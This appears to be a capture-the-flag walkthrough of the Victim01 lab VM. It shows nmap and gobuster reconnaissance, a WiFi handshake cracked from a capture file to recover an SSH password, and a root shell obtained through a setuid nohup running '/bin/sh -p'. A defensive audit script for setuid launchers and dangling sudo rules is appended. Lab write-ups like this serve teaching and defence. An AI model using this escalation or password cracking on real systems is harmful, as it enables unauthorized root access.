
Victim01_042220

Recon as usual.

Host discovery
┌──(kali㉿kali)-[~]
└─$ sudo nmap -sn 192.168.56.0/24
Starting Nmap 7.94SVN ( https://nmap.org ) at 2023-12-10 08:35 EST
Nmap scan report for 192.168.56.1
Host is up (0.035s latency).
MAC Address: 0A:00:27:00:00:3C (Unknown)
Nmap scan report for 192.168.56.100
Host is up (0.0031s latency).
MAC Address: 08:00:27:AD:92:33 (Oracle VirtualBox virtual NIC)
Nmap scan report for 192.168.56.102
Host is up (0.00036s latency).
MAC Address: 08:00:27:E0:21:73 (Oracle VirtualBox virtual NIC)
Nmap scan report for 192.168.56.101
Host is up.
Nmap done: 256 IP addresses (4 hosts up) scanned in 2.43 seconds
Port probing
┌──(kali㉿kali)-[~/redteamnotes/victim01]
└─$ sudo nmap --min-rate 10000 -p- 192.168.56.102 
Starting Nmap 7.94SVN ( https://nmap.org ) at 2023-12-10 08:35 EST
Nmap scan report for 192.168.56.102
Host is up (0.0022s latency).
Not shown: 65530 filtered tcp ports (no-response)
PORT     STATE SERVICE
22/tcp   open  ssh
80/tcp   open  http
8080/tcp open  http-proxy
8999/tcp open  bctp
9000/tcp open  cslistener
MAC Address: 08:00:27:E0:21:73 (Oracle VirtualBox virtual NIC)
Nmap done: 1 IP address (1 host up) scanned in 13.74 seconds
TCP scan
┌──(kali㉿kali)-[~/redteamnotes/victim01]
└─$ sudo nmap -sT -sV -sC -O -p22,80,8080,8999,9000 192.168.56.102 
Starting Nmap 7.94SVN ( https://nmap.org ) at 2023-12-10 08:36 EST
Nmap scan report for 192.168.56.102
Host is up (0.00074s latency).
PORT     STATE SERVICE VERSION
22/tcp   open  ssh     OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   2048 ea:e8:15:7d:8a:74:bc:45:09:76:34:13:2c:d8:1e:62 (RSA)
|   256 51:75:37:23:b6:0f:7d:ed:61:a0:61:18:21:89:35:5d (ECDSA)
|_  256 7d:36:08:ba:91:ef:24:9f:7b:24:f6:64:c7:53:2c:b0 (ED25519)
80/tcp   open  http    Apache httpd 2.4.29 ((Ubuntu))
|_http-title: 403 Forbidden
|_http-server-header: Apache/2.4.29 (Ubuntu)
8080/tcp open  http    BusyBox httpd 1.13
|_http-title: 404 Not Found
8999/tcp open  http    WebFS httpd 1.21
|_http-server-header: webfs/1.21
|_http-title: 0.0.0.0:8999/
9000/tcp open  http    PHP cli server 5.5 or later (PHP 7.2.30-1)
|_http-title: Uncaught Exception: MissingDatabaseExtensionException
MAC Address: 08:00:27:E0:21:73 (Oracle VirtualBox virtual NIC)
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose|storage-misc
Running (JUST GUESSING): Linux 4.X|5.X|2.6.X|3.X (93%), Synology DiskStation Manager 5.X (85%)
OS CPE: cpe:/o:linux:linux_kernel:4 cpe:/o:linux:linux_kernel:5 cpe:/o:linux:linux_kernel:2.6.32 cpe:/o:linux:linux_kernel:3.10 cpe:/a:synology:diskstation_manager:5.2
Aggressive OS guesses: Linux 4.15 - 5.8 (93%), Linux 5.0 - 5.4 (93%), Linux 5.0 - 5.5 (92%), Linux 5.4 (87%), Linux 2.6.32 (87%), Linux 3.10 (87%), Linux 3.10 - 4.11 (87%), Linux 3.2 - 4.9 (87%), Linux 3.4 - 3.10 (87%), Linux 5.1 (87%)
No exact OS matches for host (test conditions non-ideal).
Network Distance: 1 hop
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 29.28 seconds
UDP scan
┌──(kali㉿kali)-[~/redteamnotes/victim01]
└─$ sudo nmap -sU --top-ports 20 192.168.56.102
Starting Nmap 7.94SVN ( https://nmap.org ) at 2023-12-10 08:38 EST
Nmap scan report for 192.168.56.102
Host is up (0.00049s latency).
PORT      STATE         SERVICE
53/udp    open|filtered domain
67/udp    open|filtered dhcps
68/udp    open|filtered dhcpc
69/udp    open|filtered tftp
123/udp   open|filtered ntp
135/udp   open|filtered msrpc
137/udp   open|filtered netbios-ns
138/udp   open|filtered netbios-dgm
139/udp   open|filtered netbios-ssn
161/udp   open|filtered snmp
162/udp   open|filtered snmptrap
445/udp   open|filtered microsoft-ds
500/udp   open|filtered isakmp
514/udp   open|filtered syslog
520/udp   open|filtered route
631/udp   open|filtered ipp
1434/udp  open|filtered ms-sql-m
1900/udp  open|filtered upnp
4500/udp  open|filtered nat-t-ike
49152/udp open|filtered unknown
MAC Address: 08:00:27:E0:21:73 (Oracle VirtualBox virtual NIC)
Nmap done: 1 IP address (1 host up) scanned in 2.03 seconds
Script scan
┌──(kali㉿kali)-[~/redteamnotes/victim01]
└─$ sudo nmap --script=vuln -p22,80,8080,8999,9000 192.168.56.102 
Starting Nmap 7.94SVN ( https://nmap.org ) at 2023-12-10 08:39 EST
Nmap scan report for 192.168.56.102
Host is up (0.00049s latency).
PORT     STATE SERVICE
22/tcp   open  ssh
80/tcp   open  http
|_http-stored-xss: Couldn't find any stored XSS vulnerabilities.
|_http-csrf: Couldn't find any CSRF vulnerabilities.
|_http-dombased-xss: Couldn't find any DOM based XSS.
8080/tcp open  http-proxy
| http-slowloris-check: 
|   VULNERABLE:
|   Slowloris DOS attack
|     State: LIKELY VULNERABLE
|     IDs:  CVE:CVE-2007-6750
|       Slowloris tries to keep many connections to the target web server open and hold
|       them open as long as possible.  It accomplishes this by opening connections to
|       the target web server and sending a partial request. By doing so, it starves
|       the http server's resources causing Denial Of Service.
|       
|     Disclosure date: 2009-09-17
|     References:
|       http://ha.ckers.org/slowloris/
|_      https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-6750
8999/tcp open  bctp
9000/tcp open  cslistener
MAC Address: 08:00:27:E0:21:73 (Oracle VirtualBox virtual NIC)
Nmap done: 1 IP address (1 host up) scanned in 99.21 seconds

Let's look at port 80 first.

Doesn't look like much.


What about 8080?

┌──(kali㉿kali)-[~/redteamnotes/victim01]
└─$ sudo gobuster dir -u http://192.168.56.103:8080/ -x txt,php,rar,zip,tar,sql -w /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt
===============================================================
Gobuster v3.6
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://192.168.56.103:8080/
[+] Method:                  GET
[+] Threads:                 10
[+] Wordlist:                /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt
[+] Negative Status codes:   404
[+] User Agent:              gobuster/3.6
[+] Extensions:              tar,sql,txt,php,rar,zip
[+] Timeout:                 10s
===============================================================
Starting gobuster in directory enumeration mode
===============================================================
Error: error on running gobuster: unable to connect to http://192.168.56.103:8080/: Get "http://192.168.56.103:8080/": dial tcp 192.168.56.103:8080: connect: no route to host
Nothing there.

Try 8999?

Way too much in there.

Huh? Why is there a .cap file?

Open it up and take a look.


Found a username.

Got stuck at this point.

After looking around online for a while:

Used aircrack-ng to crack the WiFi handshake in the capture and got the password p4ssword.

[[WiFi cracking with aircrack-ng]]

┌──(kali㉿kali)-[~/redteamnotes/victim01]
└─$ sudo ssh dlink@192.168.56.102                  
dlink@192.168.56.102's password: 
Last login: Tue Apr  7 23:36:49 2020 from 192.168.86.99
dlink@victim01:~$ ls
dlink@victim01:~$ sudo -l
User dlink may run the following commands on localhost:
    (ALL) NOPASSWD: /usr/bin/TryHarder!
dlink@victim01:~$ ^C
dlink@victim01:~$ sudo root -u /usr/bin/TryHarder!
[sudo] password for dlink: 
sudo: root: command not found
dlink@victim01:~$ sudo nohup /bin/sh -c "sh <$(tty) >$(tty) 2>$(tty)"
[sudo] password for dlink: 
Sorry, user dlink is not allowed to execute '/usr/bin/nohup /bin/sh -c sh </dev/pts/0 >/dev/pts/0 2>/dev/pts/0' as root on localhost.localdomain.
dlink@victim01:~$ sudo nohup /bin/sh -c "sh <$(tty) >$(tty) 2>$(tty)"
[sudo] password for dlink: 
Sorry, user dlink is not allowed to execute '/usr/bin/nohup /bin/sh -c sh </dev/pts/0 >/dev/pts/0 2>/dev/pts/0' as root on localhost.localdomain.
dlink@victim01:~$ nohup /bin/sh -p -c "sh -p <$(tty) >$(tty) 2>$(tty)"
nohup: ignoring input and appending output to 'nohup.out'
# whoami
root
# ls
nohup.out
# cd /root
# ls
flag.txt  snap
# ls -liah
total 68K
131076 drwx------  7 root root 4.0K Apr  7  2020 .
     2 drwxr-xr-x 23 root root 4.0K Apr  7  2020 ..
152360 lrwxrwxrwx  1 root root    9 Aug  2  2019 .bash_history -> /dev/null
131090 -rw-r--r--  1 root root 3.1K Apr  9  2018 .bashrc
264335 drwx------  2 root root 4.0K Apr  7  2020 .cache
406739 drwx------  3 root root 4.0K Aug  2  2019 .gnupg
152515 -rw-------  1 root root   49 Apr  7  2020 .lesshst
264119 drwxr-xr-x  3 root root 4.0K Apr  7  2020 .local
152482 -rw-------  1 root root    0 Apr  7  2020 .mysql_history
131091 -rw-r--r--  1 root root  148 Aug 17  2015 .profile
153732 -rw-------  1 root root    7 Apr  7  2020 .python_history
134777 -rw-r--r--  1 root root   66 Apr  7  2020 .selected_editor
281027 drwx------  2 root root 4.0K Apr  7  2020 .ssh
135782 -rw-------  1 root root 8.1K Aug  3  2019 .viminfo
132830 -rw-r--r--  1 root root  207 Apr  7  2020 .wget-hsts
153740 -rw-r--r--  1 root root  556 Apr  7  2020 flag.txt
289258 drwxr-xr-x  3 root root 4.0K Apr  7  2020 snap
# cat fl
cat: fl: No such file or directory
# cat flag.txt
Nice work!.:##:::..:::::/;;\:.()::::::@::/;;#;|:.::::##::::|;;##;|::':::::::::\;;;/::'':::::::::::|O|O|O|O|O|O:#:::::::##::..:###:::::#:::::.:::##:::::::::::#:.::::;:::::::::###::.':::;::###::;::#:::::::::;::#::;:::::::::::##:;::::::;::::###:::     ..:::::; .:::##::::::::::::::::::::::; :::::::::::::::::##::  #rootdance
# cat snap
cat: snap: Is a directory
# cd snap
# ls
microk8s
# cd microk8s
# ls
1320  common  current
# ls
1320  common  current
# 
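Two checks a defender would run on a box like this, as an added shell example that is not part of the original post: an audit for setuid launcher binaries (the root shell above, reached through `nohup` and `sh -p` without sudo, only works if `nohup` on the box is setuid root, which the post never states outright but the session implies) and for sudo rules whose command path does not exist, like the `/usr/bin/TryHarder!` entry from `sudo -l`. The LAUNCHERS list, function names and output format are my own.

```shell
#!/bin/sh
# Added audit helper (not from the original post). Two checks that would have
# flagged what the session above exploits:
#  1. setuid/setgid binaries whose job is to launch another program (nohup,
#     env, find, ...): a setuid copy of those hands any local user a root shell.
#  2. sudo rules whose command path is missing on disk, like
#     "(ALL) NOPASSWD: /usr/bin/TryHarder!" from the sudo -l output above.
# Assumes POSIX sh and find(1). LAUNCHERS is illustrative; extend it per fleet.

LAUNCHERS="nohup env find nice ionice timeout stdbuf taskset xargs chroot setarch"

# flag_launchers TREE
# Prints "SETUID LAUNCHER: <path>" for every setuid/setgid regular file under
# TREE whose basename is in LAUNCHERS. On a live host scan "/".
flag_launchers() {
    find "$1" -xdev -type f \( -perm -4000 -o -perm -2000 \) 2>/dev/null |
    while IFS= read -r path; do
        name=${path##*/}
        for l in $LAUNCHERS; do
            if [ "$name" = "$l" ]; then
                printf 'SETUID LAUNCHER: %s\n' "$path"
            fi
        done
    done
}

# missing_sudo_targets FILE
# FILE holds sudoers-style rules or pasted "sudo -l" lines. Prints
# "DANGLING SUDO RULE: <cmd>" for each command path that does not exist.
missing_sudo_targets() {
    grep -v '^[[:space:]]*#' "$1" | grep ')' | while IFS= read -r line; do
        rest=${line##*\)}         # drop the "user HOST=(runas)" part
        rest=${rest##*:}          # drop NOPASSWD: / SETENV: style tags
        # a rule may list several commands separated by commas
        printf '%s\n' "$rest" | tr ',' '\n' | while IFS= read -r cmd; do
            set -- $cmd           # first word is the executable path
            if [ -n "${1:-}" ] && [ "$1" != ALL ] && [ ! -e "$1" ]; then
                printf 'DANGLING SUDO RULE: %s\n' "$1"
            fi
        done
    done
}

# Live usage: flag_launchers / ; sudo -l > /tmp/rules ; missing_sudo_targets /tmp/rules
```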
http://www.jsqmd.com/news/338625/
